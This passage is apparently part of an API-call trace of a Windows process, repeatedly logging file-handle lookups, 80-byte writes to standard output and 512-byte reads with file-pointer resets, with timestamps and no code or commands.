lpOverlapped=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] GetFileType (hFile=0x4c) returned 0x1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] GetFileType (hFile=0x4c) returned 0x1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] GetFileType (hFile=0x4c) returned 0x1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] GetFileType (hFile=0x4c) returned 0x1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] GetFileType (hFile=0x4c) returned 0x1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.643] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.643] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] GetFileType (hFile=0x4c) returned 0x1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] GetFileType (hFile=0x4c) returned 0x1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] GetFileType (hFile=0x4c) returned 0x1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] GetFileType (hFile=0x4c) returned 0x1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] GetFileType (hFile=0x4c) returned 0x1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] GetFileType (hFile=0x4c) returned 0x1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] GetFileType (hFile=0x4c) returned 0x1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] GetFileType (hFile=0x4c) returned 0x1 [0098.644] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.644] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.644] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.644] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.644] GetFileType (hFile=0x4c) returned 0x1 [0098.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.644] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.644] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.644] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.644] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.645] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.645] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.645] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.645] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.645] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.645] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.645] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.646] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.646] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.646] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.646] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.646] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.646] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.646] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.646] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.647] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.647] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.647] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.647] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.647] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.647] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.647] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.648] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.648] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.648] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.648] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.718] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.718] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.718] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.718] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.718] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.719] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.719] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.719] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.719] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.719] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.719] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.719] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.720] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.720] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.720] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.720] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.720] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.720] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, 